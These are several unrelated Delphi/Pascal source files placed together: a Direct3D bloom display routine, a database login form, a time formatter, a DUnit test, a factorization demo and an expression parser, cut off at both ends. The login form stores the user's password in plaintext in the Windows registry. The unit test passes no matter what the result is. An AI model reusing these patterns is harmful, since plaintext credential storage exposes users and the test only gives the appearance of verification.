IDirect3DDevice9; const pFont: ID3DXFont; const pTextSprite: ID3DXSprite; const pArrowTex: IDirect3DTexture9 ): HRESULT; var pSurf: IDirect3DSurface9; d: TD3DSurfaceDesc; fW, fH: Single; fCellW, fCellH: Single; v: array[0..3] of PostProcess.TLVertex; txtHelper: CDXUTTextHelper; str: array[0..99] of WideChar; begin // [ 0 ] COMMON INITIALIZATION //---------------------------- if FAILED(pDevice.GetRenderTarget(0, pSurf)) then begin // Couldn't get the current render target! OutputDebugString('PostProcess::DisplaySteps() - Could not get current render target to extract dimensions.'#10); Result:= E_FAIL; Exit; end; pSurf.GetDesc(d); pSurf := nil; // Cache the dimensions as floats for later use fW := d.Width; fH := d.Height; fCellW := (fW - 48.0) / 4.0; fCellH := (fH - 36.0) / 4.0; // Fill out the basic TLQuad information - this // stuff doesn't change for each stage v[0].t := D3DXVector2(0.0, 0.0); v[1].t := D3DXVector2(1.0, 0.0); v[2].t := D3DXVector2(0.0, 1.0); v[3].t := D3DXVector2(1.0, 1.0); // Configure the device for it's basic states pDevice.SetVertexShader(nil); pDevice.SetFVF(FVF_TLVERTEX); pDevice.SetPixelShader(nil); txtHelper := CDXUTTextHelper.Create(pFont, pTextSprite, 12); txtHelper.SetForegroundColor(D3DXColor(1.0, 0.5, 0.0, 1.0)); // [ 1 ] RENDER BRIGHT PASS STAGE //------------------------------- v[0].p := D3DXVector4(0.0, 0.0, 0.0, 1.0); v[1].p := D3DXVector4(fCellW, 0.0, 0.0, 1.0); v[2].p := D3DXVector4(0.0, fCellH, 0.0, 1.0); v[3].p := D3DXVector4(fCellW, fCellH, 0.0, 1.0); pDevice.SetTexture(0, PostProcess.g_pBrightPassTex); pDevice.DrawPrimitiveUP(D3DPT_TRIANGLESTRIP, 2, v, SizeOf(PostProcess.TLVertex)); txtHelper._Begin; begin txtHelper.SetInsertionPos(5, Trunc(fCellH - 25.0)); txtHelper.DrawTextLine('Bright-Pass'); PostProcess.g_pBrightPassTex.GetLevelDesc(0, d); StringCchFormat(str, 100, '%dx%d', [d.Width, d.Height]); txtHelper.DrawTextLine(str); end; txtHelper._End; // [ 2 ] RENDER DOWNSAMPLED STAGE //------------------------------- v[0].p := D3DXVector4(fCellW + 16.0, 0.0, 0.0, 1.0); v[1].p := D3DXVector4((2.0 * fCellW) + 16.0, 0.0, 0.0, 1.0); v[2].p := D3DXVector4(fCellW + 16.0, fCellH, 0.0, 1.0); v[3].p := D3DXVector4((2.0 * fCellW) + 16.0, fCellH, 0.0, 1.0); pDevice.SetTexture(0, PostProcess.g_pDownSampledTex); pDevice.DrawPrimitiveUP(D3DPT_TRIANGLESTRIP, 2, v, SizeOf(PostProcess.TLVertex)); txtHelper._Begin; begin txtHelper.SetInsertionPos(Trunc(fCellW + 16.0) + 5, Trunc(fCellH - 25.0)); txtHelper.DrawTextLine('Down-Sampled'); PostProcess.g_pDownSampledTex.GetLevelDesc(0, d); StringCchFormat(str, 100, '%dx%d', [d.Width, d.Height]); txtHelper.DrawTextLine(str); end; txtHelper._End; // [ 3 ] RENDER HORIZONTAL BLUR STAGE //----------------------------------- v[0].p := D3DXVector4((2.0 * fCellW) + 32.0, 0.0, 0.0, 1.0); v[1].p := D3DXVector4((3.0 * fCellW) + 32.0, 0.0, 0.0, 1.0); v[2].p := D3DXVector4((2.0 * fCellW) + 32.0, fCellH, 0.0, 1.0); v[3].p := D3DXVector4((3.0 * fCellW) + 32.0, fCellH, 0.0, 1.0); pDevice.SetTexture(0, PostProcess.g_pBloomHorizontal); pDevice.DrawPrimitiveUP(D3DPT_TRIANGLESTRIP, 2, v, SizeOf(PostProcess.TLVertex)); txtHelper._Begin; begin txtHelper.SetInsertionPos(Trunc(2.0 * fCellW + 32.0) + 5, Trunc(fCellH - 25.0)); txtHelper.DrawTextLine('Horizontal Blur'); PostProcess.g_pBloomHorizontal.GetLevelDesc(0, d); StringCchFormat(str, 100, '%dx%d', [d.Width, d.Height]); txtHelper.DrawTextLine(str); end; txtHelper._End; // [ 4 ] RENDER VERTICAL BLUR STAGE //--------------------------------- v[0].p := D3DXVector4((3.0 * fCellW) + 48.0, 0.0, 0.0, 1.0); v[1].p := D3DXVector4((4.0 * fCellW) + 48.0, 0.0, 0.0, 1.0); v[2].p := D3DXVector4((3.0 * fCellW) + 48.0, fCellH, 0.0, 1.0); v[3].p := D3DXVector4((4.0 * fCellW) + 48.0, fCellH, 0.0, 1.0); pDevice.SetTexture(0, PostProcess.g_pBloomVertical); pDevice.DrawPrimitiveUP(D3DPT_TRIANGLESTRIP, 2, v, SizeOf( PostProcess.TLVertex )); txtHelper._Begin; begin txtHelper.SetInsertionPos(Trunc(3.0 * fCellW + 48.0) + 5, Trunc(fCellH - 25.0)); txtHelper.DrawTextLine('Vertical Blur'); PostProcess.g_pDownSampledTex.GetLevelDesc(0, d); StringCchFormat(str, 100, '%dx%d', [d.Width, d.Height]); txtHelper.DrawTextLine(str); end; txtHelper._End; txtHelper.Free; // [ 5 ] RENDER ARROWS //-------------------- pDevice.SetTexture(0, pArrowTex); // Locate the "Left" Arrow: v[0].t := D3DXVector2(0.25, 0.0); v[1].t := D3DXVector2(0.50, 0.0); v[2].t := D3DXVector2(0.25, 1.0); v[3].t := D3DXVector2(0.50, 1.0); // Bright-Pass -> Down Sampled: v[0].p := D3DXVector4(fCellW, (fCellH / 2.0) - 8.0, 0.0, 1.0); v[1].p := D3DXVector4(fCellW + 16.0, (fCellH / 2.0) - 8.0, 0.0, 1.0); v[2].p := D3DXVector4(fCellW, (fCellH / 2.0) + 8.0, 0.0, 1.0); v[3].p := D3DXVector4(fCellW + 16.0, (fCellH / 2.0) + 8.0, 0.0, 1.0); pDevice.DrawPrimitiveUP(D3DPT_TRIANGLESTRIP, 2, v, SizeOf(PostProcess.TLVertex)); // Down Sampled -> Horizontal Blur: v[0].p := D3DXVector4((2.0 * fCellW) + 16.0, (fCellH / 2.0) - 8.0, 0.0, 1.0); v[1].p := D3DXVector4((2.0 * fCellW) + 32.0, (fCellH / 2.0) - 8.0, 0.0, 1.0); v[2].p := D3DXVector4((2.0 * fCellW) + 16.0, (fCellH / 2.0) + 8.0, 0.0, 1.0); v[3].p := D3DXVector4((2.0 * fCellW) + 32.0, (fCellH / 2.0) + 8.0, 0.0, 1.0); pDevice.DrawPrimitiveUP(D3DPT_TRIANGLESTRIP, 2, v, SizeOf(PostProcess.TLVertex)); // Horizontal Blur -> Vertical Blur: v[0].p := D3DXVector4((3.0 * fCellW) + 32.0, (fCellH / 2.0) - 8.0, 0.0, 1.0); v[1].p := D3DXVector4((3.0 * fCellW) + 48.0, (fCellH / 2.0) - 8.0, 0.0, 1.0); v[2].p := D3DXVector4((3.0 * fCellW) + 32.0, (fCellH / 2.0) + 8.0, 0.0, 1.0); v[3].p := D3DXVector4((3.0 * fCellW) + 48.0, (fCellH / 2.0) + 8.0, 0.0, 1.0); pDevice.DrawPrimitiveUP(D3DPT_TRIANGLESTRIP, 2, v, SizeOf(PostProcess.TLVertex)); // Locate the "Down" arrow: v[0].t := D3DXVector2(0.50, 0.0); v[1].t := D3DXVector2(0.75, 0.0); v[2].t := D3DXVector2(0.50, 1.0); v[3].t := D3DXVector2(0.75, 1.0); // Vertical Blur -> Final Image Composition: v[0].p := D3DXVector4((3.5 * fCellW) + 40.0, fCellH, 0.0, 1.0); v[1].p := D3DXVector4((3.5 * fCellW) + 56.0, fCellH, 0.0, 1.0); v[2].p := D3DXVector4((3.5 * fCellW) + 40.0, fCellH + 16.0, 0.0, 1.0); v[3].p := D3DXVector4((3.5 * fCellW) + 56.0, fCellH + 16.0, 0.0, 1.0); pDevice.DrawPrimitiveUP(D3DPT_TRIANGLESTRIP, 2, v, SizeOf(PostProcess.TLVertex)); Result:= S_OK; end; //-------------------------------------------------------------------------------------- // CalculateResourceUsage( ) // // DESC: // Based on the known resources this function attempts to make an accurate // measurement of how much VRAM is being used by this part of the application. // // NOTES: // Whilst the return value should be pretty accurate, it shouldn't be relied // on due to the way drivers/hardware can allocate memory. // // Only the first level of the render target is checked as there should, by // definition, be no mip levels. // //-------------------------------------------------------------------------------------- function CalculateResourceUsage: DWORD; var usage: DWORD; d: TD3DSurfaceDesc; begin usage := 0; if SUCCEEDED(g_pBrightPassTex.GetLevelDesc(0, d)) then usage := usage + ( ( d.Width * d.Height ) * DWORD(IfThen(PostProcess.g_fmtHDR = D3DFMT_A32B32G32R32F, 16, 8))); if SUCCEEDED(g_pDownSampledTex.GetLevelDesc(0, d)) then usage := usage + ( ( d.Width * d.Height ) * DWORD(IfThen(PostProcess.g_fmtHDR = D3DFMT_A32B32G32R32F, 16, 8))); if SUCCEEDED(g_pBloomHorizontal.GetLevelDesc(0, d)) then usage := usage + ( ( d.Width * d.Height ) * DWORD(IfThen(PostProcess.g_fmtHDR = D3DFMT_A32B32G32R32F, 16, 8))); if SUCCEEDED(g_pBloomVertical.GetLevelDesc(0, d)) then usage := usage + ( ( d.Width * d.Height ) * DWORD(IfThen(PostProcess.g_fmtHDR = D3DFMT_A32B32G32R32F, 16, 8))); Result:= usage; end; //-------------------------------------------------------------------------------------- // RenderToTexture( ) // // DESC: // A simple utility function that draws, as a TL Quad, one texture to another // such that a pixel shader (configured before this function is called) can // operate on the texture. Used by MeasureLuminance() to perform the // downsampling and filtering. // // PARAMS: // pDevice : The currently active device // // NOTES: // n/a // //-------------------------------------------------------------------------------------- function RenderToTexture(const pDev: IDirect3DDevice9): HRESULT; var desc: TD3DSurfaceDesc; pSurfRT: IDirect3DSurface9; fWidth, fHeight: Single; v: array[0..3] of PostProcess.TLVertex; begin pDev.GetRenderTarget(0, pSurfRT); pSurfRT.GetDesc(desc); pSurfRT := nil; // To correctly map from texels->pixels we offset the coordinates // by -0.5f: fWidth := desc.Width - 0.5; fHeight := desc.Height - 0.5; // Now we can actually assemble the screen-space geometry // PostProcess::TLVertex v[4]; v[0].p := D3DXVector4(-0.5, -0.5, 0.0, 1.0); v[0].t := D3DXVector2(0.0, 0.0); v[1].p := D3DXVector4(fWidth, -0.5, 0.0, 1.0); v[1].t := D3DXVector2(1.0, 0.0); v[2].p := D3DXVector4(-0.5, fHeight, 0.0, 1.0); v[2].t := D3DXVector2(0.0, 1.0); v[3].p := D3DXVector4(fWidth, fHeight, 0.0, 1.0); v[3].t := D3DXVector2(1.0, 1.0); // Configure the device and render.. pDev.SetVertexShader(nil); pDev.SetFVF(PostProcess.FVF_TLVERTEX); pDev.DrawPrimitiveUP(D3DPT_TRIANGLESTRIP, 2, v, SizeOf(PostProcess.TLVertex)); Result:= S_OK; end; function ComputeGaussianValue(x: Single; mean: Single; std_deviation: Single): Single; begin // The gaussian equation is defined as such: (* -(x - mean)^2 ------------- 1.0 2*std_dev^2 f(x,mean,std_dev) = -------------------- * e^ sqrt(2*pi*std_dev^2) *) Result:= ( 1.0 / sqrt(2.0 * D3DX_PI * std_deviation * std_deviation) ) * exp( (-((x-mean)*(x-mean)))/(2.0 * std_deviation * std_deviation)); end; end.
unit Access_Unit; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, cxLookAndFeelPainters, StdCtrls, cxButtons, cxControls, cxContainer, cxEdit, cxTextEdit, AccMGMT, cxCheckBox, Registry, ibase; type TAccessResult = record ID_User:integer; Name_user:string; User_Id_Card:integer; User_Fio:string; DB_Handle : TISC_DB_HANDLE; Password: string; end; type TfrmAccess = class(TForm) LoginEdit: TcxTextEdit; PasswordEdit: TcxTextEdit; cxButton1: TcxButton; cxButton2: TcxButton; SafePassword_CheckBox: TcxCheckBox; Label1: TLabel; Label2: TLabel; procedure FormShow(Sender: TObject); procedure cxButton1Click(Sender: TObject); procedure PasswordEditKeyDown(Sender: TObject; var Key: Word; Shift: TShiftState); procedure cxButton2Click(Sender: TObject); procedure LoginEditKeyPress(Sender: TObject; var Key: Char); private countoftry : byte; public AccessResult : TAccessResult; constructor Create(AOwner:TComponent);override; end; var frmAccess: TfrmAccess; implementation {$R *.dfm} constructor TfrmAccess.Create(AOwner:TComponent); var reg: TRegistry; begin inherited Create(AOwner); countoftry := 0; reg:=TRegistry.Create; try reg.RootKey:=HKEY_CURRENT_USER; if reg.OpenKey('\Software\VC\Login\',False) then begin LoginEdit.Text:=reg.ReadString('Login'); end; if reg.OpenKey('\Software\VC\Password\',False) then begin PasswordEdit.Text:=reg.ReadString('Password'); if PasswordEdit.Text <> '' then SafePassword_CheckBox.Checked:=true; end finally reg.Free; end; end; procedure TfrmAccess.FormShow(Sender: TObject); begin LoginEdit.SetFocus; end; procedure TfrmAccess.cxButton1Click(Sender: TObject); var ss: TShiftState; key : Word; begin ss:=[ssShift] ; key :=13; PasswordEditKeyDown(self, key, ss); end; procedure TfrmAccess.PasswordEditKeyDown(Sender: TObject; var Key: Word; Shift: TShiftState); var InitResult: Integer; reg: TRegistry; CurrentLogin, CurrentPassword:string; ResultInfo : TResultInfo; Label GameOver; begin if Key = VK_RETURN then begin inc(countoftry); //****************************************************************************** CurrentLogin := LoginEdit.Text; CurrentPassword := PasswordEdit.Text; reg := TRegistry.Create; try reg.RootKey:=HKEY_CURRENT_USER; if reg.OpenKey('\Software\VC\Login\',True) then begin reg.WriteString('Login',CurrentLogin); end; if SafePassword_CheckBox.Checked then if reg.OpenKey('\Software\VC\Password\',True) then begin reg.WriteString('Password',CurrentPassword); end; if not SafePassword_CheckBox.Checked then if reg.OpenKey('\Software\VC\Password\',True) then begin reg.DeleteValue('Password'); end finally reg.Free; end; //****************************************************************************** //InitResult := -1; try ResultInfo := fibInitConnection(CurrentLogin,CurrentPassword); except on e: Exception do begin MessageDlg(e.Message, mtError,[mbOk],0); if CountOfTry>=3 then Application.Terminate else Exit; end; end; //****************************************************************************** if ResultInfo.ErrorCode <> ACCMGMT_OK then begin ShowMessage(AcMgmtErrMsg(ResultInfo.ErrorCode)); begin LoginEdit.SetFocus; try CloseConnection; except on e: Exception do MessageDlg(e.Message, mtError,[mbOk],0); end; end; LoginEdit.SetFocus; goto GameOver; end //****************************************************************************** else begin AccessResult.ID_User:=GetUserId; AccessResult.User_Id_Card:=GetCurrentUserIDExt; AccessResult.User_Fio := GetUserFIO; AccessResult.Name_user:=CurrentLogin; AccessResult.Password:= CurrentPassword; AccessResult.DB_Handle := ResultInfo.DBHandle; if fibCheckPermission('/ROOT/VC','Belong')=0 then begin ModalResult:=mrYes; try except on e: Exception do MessageDlg(e.Message, mtError,[mbOk],0); end; GoTo GameOver; end else begin ShowMessage('Ви не маєте прав на вхід до цієї системи'); try CloseConnection; except on e: Exception do MessageDlg('Фатальна помилка в системі безпеки : ' + e.Message, mtError,[mbOk],0); end; GoTo GameOver; end; end; //****************************************************************************** GameOver: if (countoftry>=3) and (ModalResult<>mrYes) then Application.Terminate; end; end; procedure TfrmAccess.cxButton2Click(Sender: TObject); begin ModalResult:=mrNo; end; procedure TfrmAccess.LoginEditKeyPress(Sender: TObject; var Key: Char); begin if key = #13 then PasswordEdit.SetFocus; end; end.
(* Category: SWAG Title: DATE & TIME ROUTINES Original name: 0019.PAS Description: TIMEFORM.PAS Author: MIKE COPELAND Date: 05-28-93 13:37 *) { MIKE COPELAND > I'm looking For some FAST routines to change seconds into a > readable format, (ie. H:M:S). > For instance, 8071 seconds = 2:14:31 Here's the code I use, and it's fast enough For me: } Type Str8 = String[8]; Function FORMAT_TIME (V : Integer) : STR8; { format time as hh:mm:ss } Var X, Z : Integer; PTIME : STR8; begin { note: incoming time is in seconds } Z := ord('0'); PTIME := ' : : '; { initialize } X := V div 3600; V := V mod 3600; { process hours } if (X > 0) and (X <= 9) then PTIME[2] := chr(X+Z) else if X = 0 then PTIME[3] := ' ' { zero-suppress } else PTIME[2] := '*'; { overflow... } X := V div 60; V := V mod 60; { process minutes } PTIME[4] := chr((X div 10)+Z); PTIME[5] := chr((X mod 10)+Z); PTIME[7] := chr((V div 10)+Z); { process seconds } PTIME[8] := chr((V mod 10)+Z); FORMAT_TIME := PTIME end; { FORMAT_TIME } begin Writeln(Format_Time(11122)); end.
unit TestUProprietarioUnidadeController; { Delphi DUnit Test Case ---------------------- This unit contains a skeleton test case class generated by the Test Case Wizard. Modify the generated code to correctly setup and call the methods from the unit being tested. } interface uses TestFramework, UCondominioVO, SysUtils, DBClient, DBXJSON, UPessoasVO, UCondominioController, DBXCommon, UProprietarioUnidadeController, UPessoasCOntroller, Generics.Collections, Classes, UController, DB, UProprietarioUnidadeVO, ConexaoBD, SQLExpr; type // Test methods for class TProprietarioUnidadeController TestTProprietarioUnidadeController = class(TTestCase) strict private FProprietarioUnidadeController: TProprietarioUnidadeController; public procedure SetUp; override; procedure TearDown; override; published procedure TestConsultarPorId; end; implementation procedure TestTProprietarioUnidadeController.SetUp; begin FProprietarioUnidadeController := TProprietarioUnidadeController.Create; end; procedure TestTProprietarioUnidadeController.TearDown; begin FProprietarioUnidadeController.Free; FProprietarioUnidadeController := nil; end; procedure TestTProprietarioUnidadeController.TestConsultarPorId; var ReturnValue: TProprietarioUnidadeVO; // id: Integer; begin ReturnValue := FProprietarioUnidadeController.ConsultarPorId(10); if(returnvalue <> nil) then check(true,'Proprietário pesquisado com sucesso!') else check(true,'Proprietário não encontrado!'); end; initialization // Register any test cases with the test runner RegisterTest(TestTProprietarioUnidadeController.Suite); end.
// Factorization demo {$APPTYPE CONSOLE} program Factor; var LowBound, HighBound, Number, Dividend, Divisor: Integer; DivisorFound: Boolean; begin WriteLn; WriteLn('Integer factorization demo'); WriteLn; Write('From number: '); ReadLn(LowBound); Write('To number : '); ReadLn(HighBound); WriteLn; if LowBound < 2 then begin WriteLn('Numbers should be greater than 1'); ReadLn; Halt(1); end; for Number := LowBound to HighBound do begin Write(Number, ' = '); Dividend := Number; while Dividend > 1 do begin Divisor := 1; DivisorFound := FALSE; while sqr(Divisor) <= Dividend do begin Inc(Divisor); if Dividend mod Divisor = 0 then begin DivisorFound := TRUE; Break; end; end; if not DivisorFound then Divisor := Dividend; // Prime number Write(Divisor, ' '); Dividend := Dividend div Divisor; end; // while WriteLn; end; // for WriteLn; WriteLn('Done.'); ReadLn; end.
unit UnitScriptsMath; interface uses Math, SysUtils, UnitScripts, uScript; type Tfunc = set of (Fplus,Fminus,Fmultiply,Fdivide,Fnone,Fpower,F_AND,F_OR,F_XOR,F_RAVNO,F_BOLSHE,F_MENSHE); TZnak = set of (Zravno,ZBolhe,Zmenhe,ZBolheRavno,ZMenheRavno,ZneRavno); Tresult = record Nofunction : integer; Typefunction : Tfunc; end; type TFindFuncion = record Name : String; FirstChar : integer; Width : integer; firstcharname : integer; end; const znaki : set of AnsiChar = ['+','-','*','/','^','~','|','&','>','<','=']; logicznaki : set of AnsiChar = ['>','<','=']; BukviF : set of AnsiChar = ['A'..'Z','a'..'z']; zifri : set of AnsiChar = ['0'..'9']; Function StringToFloatScript(const fstr : string; const Script : TScript) : real; Function findexpression(const str : String):boolean; implementation Function FindpreviosChar(s : string; i : integer; no : integer): char; var j:integer; begin result:=#0; For j:=i downto 1 do If s[j]<>' ' then begin dec(no); If no<=0 then begin result:=s[j]; break; end; end; end; Function FindNextCharNo(s : string; i : integer; var no : integer): char; var j:integer; begin result:=#0; For j:=i to length(s) do If s[j]<>' ' then begin result:=s[j]; no:=j; break; end; end; Function DeleteProbeli(S : String) : String; var i:integer; begin for i:=length(s) downto 1 do If s[i]=' ' then delete(s,i,1); Result:=s; end; function Upcaseall(s : string):string; var i : integer; begin result:=s; for i:=1 to length(s) do result[i]:=Upcase(result[i]); end; function LoadFloat(str: string; Script : TScript): real; var s : string; minusi,i : integer; Value : Extended; begin minusi:=0; If str='' then begin result:=0; exit; end; s:=str; If s[1]='(' then begin For i:=1 to length(s) div 2 do If (s[i]='-') then inc(minusi); For i:=length(s) div 2 downto 1 do If (s[i]='-') then delete(s,i,1); end; result:=0; If s='' then exit; Repeat If s[1]='(' then begin delete(s,length(s),1); delete(s,1,1); If s='' then exit; end; until s[1]<>'('; if IsVariable(s) then Value := GetNamedValueFloat(Script, s) else Value := StrToFloatDef(s, 0); If not odd(minusi) then result:=Value else result:=-Value; end; function findnextf(strfunction:string):Tresult; var i:integer; find : boolean; begin find:=false; result.nofunction:=-1; result.typefunction:=[fnone]; If not find then for i:=1 to length(strfunction) do If strfunction[i]='=' then begin find:=true; result.nofunction:=i; result.typefunction:=[F_RAVNO]; break; end; If not find then for i:=1 to length(strfunction) do If strfunction[i]='>' then begin find:=true; result.nofunction:=i; result.typefunction:=[F_BOLSHE]; break; end; If not find then for i:=1 to length(strfunction) do If strfunction[i]='<' then begin find:=true; result.nofunction:=i; result.typefunction:=[F_MENSHE]; break; end; If not find then for i:=1 to length(strfunction) do If strfunction[i]='~' then begin find:=true; result.nofunction:=i; result.typefunction:=[F_XOR]; break; end; If not find then for i:=1 to length(strfunction) do If strfunction[i]='&' then begin find:=true; result.nofunction:=i; result.typefunction:=[F_AND]; break; end; If not find then for i:=1 to length(strfunction) do If strfunction[i]='|' then begin find:=true; result.nofunction:=i; result.typefunction:=[F_OR]; break; end; If not find then for i:=1 to length(strfunction) do If strfunction[i]='^' then begin find:=true; result.nofunction:=i; result.typefunction:=[Fpower]; break; end; If not find then for i:=1 to length(strfunction) do If strfunction[i]='*' then begin find:=true; result.nofunction:=i; result.typefunction:=[Fmultiply]; break; end; If not find then for i:=1 to length(strfunction) do If strfunction[i]='/' then begin find:=true; result.nofunction:=i; result.typefunction:=[Fdivide]; break; end; If not find then for i:=1 to length(strfunction) do If strfunction[i]='-' then If (i<>1) and (strfunction[i-1]<>'(') and (strfunction[i-1]<>'E') then begin find:=true; result.nofunction:=i; result.typefunction:=[Fminus]; break; end; If not find then for i:=1 to length(strfunction) do If strfunction[i]='+' then begin result.nofunction:=i; result.typefunction:=[Fplus]; break; end; end; function findnextr(nofunction:integer;s:string):integer; var i:integer; begin result:=length(s)+1; for i:=nofunction+1 to length(s) do begin If (s[i]='+') or (s[i]='*') or (s[i]='/') or (s[i]='^') or (s[i]='~') or (s[i]='&') or (s[i]='|') or (s[i]='=') or (s[i]='>') or (s[i]='<') then begin result:=i; break; end; If (s[i]='-') and (s[i-1]<>'(') and (s[i-1]<>'E') then begin result:=i; break; end; end; end; function findnextl(nofunction:integer;s:string):integer; var i:integer; begin result:=0; for i:=nofunction-1 downto 1 do begin If (s[i]='+') or (s[i]='*') or (s[i]='/') or (s[i]='^') or (s[i]='~') or (s[i]='&') or (s[i]='|') or (s[i]='=') or (s[i]='>') or (s[i]='<') then begin result:=i; break; end; If (s[i]='-') and (s[i-1]<>'(') and (s[i-1]<>'E') then begin result:=i; break; end; end; end; Function Replacefunctionstoresult(const str:string; const Script : TScript):string; var i,j,ns,sc,nv1,z,y,endif:integer; s,s1,sv1,sv2,ysl1,ysl2:string; znak: TZnak; r,temp,temp_,temp__,sr1,sr2:real; none:boolean; noneNo:integer; begin noneno:=1; s:=str; repeat none:=true; for i:=noneNo to length(s) do begin ns:=0; If (s[i]='A') then if (s[i+1]='b') and (s[i+2]='s') and (s[i+3]='(') then begin sc:=1; noneno:=i+1; none:=false; for j:=i+4 to length(s) do begin If s[j]='(' then sc:=sc+1; If s[j]=')' then begin sc:=sc-1; If sc=0 then begin ns:=j; break; end; end; end; s1:=copy(s,i+4,ns-i-4); r:=abs(LoadFloat(s1,Script)); s1:='('+floattostr(r)+')'; delete(s,i,ns-i+1); insert(s1,s,i); end; If (s[i]='R') then if (s[i+1]='a') and (s[i+2]='d') and (s[i+3]='(') then begin sc:=1; noneno:=i+1; none:=false; for j:=i+4 to length(s) do begin If s[j]='(' then sc:=sc+1; If s[j]=')' then begin sc:=sc-1; If sc=0 then begin ns:=j; break; end; end; end; s1:=copy(s,i+4,ns-i-4); r:=pi*2*(LoadFloat(s1,Script))/360; s1:='('+floattostr(r)+')'; delete(s,i,ns-i+1); insert(s1,s,i); end; If (s[i]='S') then if (s[i+1]='q') and (s[i+2]='r') and (s[i+3]='t') and (s[i+4]='(') then begin sc:=1; noneno:=i+1; none:=false; for j:=i+5 to length(s) do begin If s[j]='(' then sc:=sc+1; If s[j]=')' then begin sc:=sc-1; If sc=0 then begin ns:=j; break; end; end; end; s1:=copy(s,i+5,ns-i-5); temp:=LoadFloat(s1,Script); If temp>=0 then r:=sqrt(temp) else raise Ematherror.Create('Invalid Floating Operator. Exception On SQRT needs >= 0'); s1:='('+floattostr(r)+')'; delete(s,i,ns-i+1); insert(s1,s,i); end; If (s[i]='L') then if (s[i+1]='o') and (s[i+2]='g') and (s[i+3]='N') and (s[i+4]='(') then begin sc:=0; noneno:=i+1; nv1:=0; none:=false; For j:=i+5 to length(s) do begin If s[j]='(' then sc:=sc+1; If s[j]=')' then sc:=sc-1; If (s[j]=';') and (sc=0) then begin nv1:=j; break; end; end; sc:=1; sv1:=copy(s,i+5,nv1-i-5); sv1:=floattostr(StringToFloatScript(sv1,Script)); for j:=nv1 to length(s) do begin If s[j]='(' then sc:=sc+1; If s[j]=')' then begin sc:=sc-1; If sc=0 then begin ns:=j; break; end; end; end; s1:=copy(s,nv1+1,ns-nv1-1); s1:=Floattostr(StringToFloatScript(s1,Script)); temp:=LoadFloat(s1,Script); temp_:=LoadFloat(sv1,Script); r:=0; If (temp>0) and (temp_>0) and (temp_<>1) then r:=logn(temp,temp_) else begin If temp<0 then raise Ematherror.Create('Invalid Floating Operator. Base on LOGN needs >0'); If temp_<0 then raise Ematherror.Create('Invalid Floating Operator. Value on LOGN needs >0'); If temp_=0 then raise Ematherror.Create('Invalid Floating Operator. Value on LOGN needs <>0'); end; s1:='('+floattostr(r)+')'; delete(s,i,ns-i+1); insert(s1,s,i); end; If (s[i]='C') then if (s[i+1]='c') and (s[i+2]='s') and (s[i+3]='(') then begin sc:=1; noneno:=i+1; none:=false; for j:=i+4 to length(s) do begin If s[j]='(' then sc:=sc+1; If s[j]=')' then begin sc:=sc-1; If sc=0 then begin ns:=j; break; end; end; end; s1:=copy(s,i+4,ns-i-4); r:=cos(LoadFloat(s1,Script)); s1:='('+floattostr(r)+')'; delete(s,i,ns-i+1); insert(s1,s,i); end; If (s[i]='R') then if (s[i+1]='o') and (s[i+2]='u') and (s[i+3]='n') and (s[i+4]='d') and (s[i+5]='(') then begin sc:=1; noneno:=i+1; none:=false; for j:=i+6 to length(s) do begin If s[j]='(' then sc:=sc+1; If s[j]=')' then begin sc:=sc-1; If sc=0 then begin ns:=j; break; end; end; end; s1:=copy(s,i+6,ns-i-6); r:=floor(LoadFloat(s1,Script)); s1:='('+floattostr(r)+')'; delete(s,i,ns-i+1); insert(s1,s,i); end; If (s[i]='S') then if (s[i+1]='i') and (s[i+2]='n') and (s[i+3]='(') then begin sc:=1; noneno:=i+1; none:=false; for j:=i+4 to length(s) do begin If s[j]='(' then sc:=sc+1; If s[j]=')' then begin sc:=sc-1; If sc=0 then begin ns:=j; break; end; end; end; s1:=copy(s,i+4,ns-i-4); r:=sin(LoadFloat(s1,Script)); s1:='('+floattostr(r)+')'; delete(s,i,ns-i+1); insert(s1,s,i); end; if i>1 then If (s[i-1]<>'o') and (s[i]='T') and (s[i+1]='a') and (s[i+2]='n') and (s[i+3]='(') then begin sc:=1; noneno:=i+1; none:=false; for j:=i+4 to length(s) do begin If s[j]='(' then sc:=sc+1; If s[j]=')' then begin sc:=sc-1; If sc=0 then begin ns:=j; break; end; end; end; s1:=copy(s,i+4,ns-i-4); temp:=LoadFloat(s1,Script); If cos(temp)<>0 then r:=tan(temp) else raise Ematherror.Create('Invalid Floating Operator. TAN needs value <> pi/2 +p*n, n <- Z'); s1:='('+floattostr(r)+')'; delete(s,i,ns-i+1); insert(s1,s,i); end; If (s[i]='C') then if (s[i+1]='o') and (s[i+2]='T') and (s[i+3]='a') and (s[i+4]='n') and (s[i+5]='(') then begin sc:=1; noneno:=i+1; none:=false; for j:=i+6 to length(s) do begin If s[j]='(' then sc:=sc+1; If s[j]=')' then begin sc:=sc-1; If sc=0 then begin ns:=j; break; end; end; end; s1:=copy(s,i+6,ns-i-6); temp:=LoadFloat(s1,Script); If sin(temp)<>0 then r:=cotan(temp) else raise Ematherror.Create('Invalid Floating Operator. COTAN needs value <> p*n, n <- Z'); s1:='('+floattostr(r)+')'; delete(s,i,ns-i+1); insert(s1,s,i); end; If (s[i]='A') then if (s[i+1]='r') and (s[i+2]='c') and (s[i+3]='S') and (s[i+4]='i') and (s[i+5]='n') and (s[i+6]='(') then begin sc:=1; noneno:=i+1; none:=false; for j:=i+7 to length(s) do begin If s[j]='(' then sc:=sc+1; If s[j]=')' then begin sc:=sc-1; If sc=0 then begin ns:=j; break; end; end; end; s1:=copy(s,i+7,ns-i-7); temp:=LoadFloat(s1,Script); If abs(temp)<=1 then r:=arcsin(temp) else raise Ematherror.Create('Invalid Floating Operator. ARCSIN needs value <- [-1;1]'); s1:='('+floattostr(r)+')'; delete(s,i,ns-i+1); insert(s1,s,i); end; If (s[i]='A') then if (s[i+1]='r') and (s[i+2]='c') and (s[i+3]='C') and (s[i+4]='o') and (s[i+5]='s') and (s[i+6]='(') then begin sc:=1; noneno:=i+1; none:=false; for j:=i+7 to length(s) do begin If s[j]='(' then sc:=sc+1; If s[j]=')' then begin sc:=sc-1; If sc=0 then begin ns:=j; break; end; end; end; s1:=copy(s,i+7,ns-i-7); temp:=LoadFloat(s1,Script); If abs(temp)<=1 then r:=arccos(temp) else raise Ematherror.Create('Invalid Floating Operator. ARCCOS needs value <- [-1;1]'); s1:='('+floattostr(r)+')'; delete(s,i,ns-i+1); insert(s1,s,i); end; If (s[i]='A') then if (s[i+1]='r') and (s[i+2]='c') and (s[i+3]='T') and (s[i+4]='a') and (s[i+5]='n') and (s[i+6]='(') then begin sc:=1; noneno:=i+1; none:=false; for 